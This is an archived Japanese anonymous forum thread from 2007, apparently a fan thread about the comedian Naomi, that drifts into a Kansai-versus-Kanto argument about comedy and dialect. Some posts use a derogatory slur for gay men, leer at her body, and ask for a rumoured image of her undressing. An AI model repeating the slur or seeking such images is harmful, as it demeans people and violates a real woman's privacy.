長井、はなわ、エレキコミック、ねこひろし、ポカスカジャン、前田健などがいるね

211 :名無しさん:2007/02/21(水) 19:18:03
関西の子供はみんな新喜劇みて育つんだぞw
なんとかくさ〜いとかいうやつ

212 :名無しさん:2007/02/21(水) 19:20:04

長井△
はなわ×
エレキコミック×
ねこひろし×
ポカスカジャン×
前田健×

酷いなw

213 :名無しさん:2007/02/21(水) 19:21:09
>>210
おもしろないし、消えかけのばっかりやんwww

214 :名無しさん:2007/02/21(水) 19:22:02
>>211
関西のエンタみたいなものか
大人はどうなの?それ見て笑ってるの?

215 :名無しさん:2007/02/21(水) 19:22:51
すいませんけどここは尚美ちゃんのスレなので他でやって下さい。

216 :名無しさん:2007/02/21(水) 19:31:09
>>211
新喜劇は見たり、みんかったりや
別にあれみて育つわけちがう

217 :名無しさん:2007/02/21(水) 19:45:39
新喜劇見て育つってダウンタウンが言ってたよ
「ごめんくさ〜いって」
ですよ。の「あーい、とぃまてぇーん」と同じじゃん

218 :名無しさん:2007/02/21(水) 20:00:05
>>217
で?大阪のお笑い芸人がコント、歌、ダンス、ラップ、楽器、キャラメインでやってるのか?w
新喜劇っていうのは喜劇だしな

ほんと、関東人ってレベル低いな

219 :名無しさん:2007/02/21(水) 20:05:49
下履いてない格好でシャツに着替えてる画像って尚美さん?
誰か教えて!

220 :名無しさん:2007/02/21(水) 20:14:03
今週のファッションチェックのは可愛いね

221 :名無しさん:2007/02/21(水) 20:15:50
>>219
何のこと言ってるかさっぱりわかりません。アホですか?

222 :名無しさん:2007/02/21(水) 20:24:16
何この流れ…

223 :名無しさん:2007/02/21(水) 21:54:11
まとめてあぼーん

224 :名無しさん:2007/02/21(水) 22:49:56
どうでもいいが、>>210の伝えたいことに誰も触れてないなwww

225 :名無しさん:2007/02/22(木) 00:26:01
しかし太ももは反則だな


226 :名無しさん:2007/02/22(木) 02:40:57
>>219
その画像うp

227 :名無しさん:2007/02/22(木) 05:54:16
きらきらアフロ2006年8月25日のファッションが一番可愛い

228 :名無しさん:2007/02/22(木) 08:59:09
関西の芸は一発芸が多いのかな
意味不明な発言とその雰囲気で笑わせる
当たり外れが激しいと思う

229 :名無しさん:2007/02/22(木) 09:52:59
>>228
ほんとに、関東風味はレベル低いなw
関西芸人のどこが一発芸多いんだ?それは関東風芸人だろ、
関東は一発芸も多いが、一発屋も多いな

くだらんキャラ、ラップ、コント、ダンスwなんかでやってるから、
一瞬で消えてくよなw

230 :名無しさん:2007/02/22(木) 10:24:03
関西芸人がボケに対してずっこけるのは新喜劇を見て育ったから?

231 :名無しさん:2007/02/22(木) 11:01:41
ボケでも鈍くて反応できす、突っ込めず、ほったらかしでうける場でもすべらせる関東人
『あ、あ〜・・・すいません・・・』とか寒いw

232 :名無しさん:2007/02/22(木) 11:25:21
そのなんでもかんでもつっこむのがうざいんだが
型にはまった笑いというか
フリートークでも漫才みたいになってるし

233 :名無しさん:2007/02/22(木) 11:31:51
>>232
そこで突っ込めない方がしらけてうっとおしいんだけどなw

234 :名無しさん:2007/02/22(木) 12:48:06
関西は素人が普段の会話でもつっこむらしいね
うぜー

235 :名無しさん:2007/02/22(木) 14:00:56
関東人は寒い・・・
関西人は普通のトークも笑えるトークも空気読んでできるが

関東人は・・・常に寒い・・・

236 :名無しさん:2007/02/22(木) 14:20:59
君は関西人のくせに面白いこと一言も言ってないね

237 :名無しさん:2007/02/22(木) 14:29:02
>>236
空気読んでるだけだよ、書き込みもわざわざ標準語だしなw
正直キモイけどな、標準語、オカマみたいで

生で聞いたら、寒気した
特に男が全部オカマに見えるw

238 :名無しさん:2007/02/22(木) 14:38:05
関西弁は聞くだけでうるさく感じる
ストレス溜まるんだよね

239 :名無しさん:2007/02/22(木) 14:47:20
>>237
本人気づいてないけど君は関西でも特別浮いてる人なんじゃね?

240 :名無しさん:2007/02/22(木) 14:54:28
オセロの白も黒も太ももさいこお

241 :名無しさん:2007/02/22(木) 15:02:44
>>238
だよね

きんも〜w

>>239
なんじゃね

きんも〜w

242 :名無しさん:2007/02/22(木) 16:16:58
せんばたろう
きむらすすむ


243 :名無しさん:2007/02/22(木) 18:46:18


なほみの動画か画像キボン



244 :名無しさん:2007/02/22(木) 21:42:54
>>221
そんな画像があるから誰か知らないか聞いてるだけ!


245 :名無しさん:2007/02/22(木) 21:45:10
ナホミは関西弁ですが

246 :名無しさん:2007/02/22(木) 22:47:53
>>244
画像貼らなきゃわかんねえだろ。もしかしてアホですか?
画像見てないけど最近話題の「バベル」じゃね?

247 :名無しさん:2007/02/22(木) 23:36:44
>>246
もしかしてアホですw
きらきら面白かったですねw

画像は探してください(_ _)
すぐ見つかりますよ!



248 :名無しさん:2007/02/23(金) 05:11:07
きらきらアホロ

249 :名無しさん:2007/02/23(金) 07:08:19
ミニスカ姿はミニスカ世界選手権で一位と審査員特別賞を両方取れるレベル

250 :名無しさん:2007/02/23(金) 15:54:01
そろそろ白の画像貼れや

251 :名無しさん:2007/02/23(金) 16:27:58
今回のきらきらは超ミニスカ

252 :名無しさん:2007/02/23(金) 18:20:34
ミニスカいいよね
きらきら見れていいなどういうのかまた教えてください

253 :251:2007/02/23(金) 21:18:11
きゃぷでよければうpします。

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)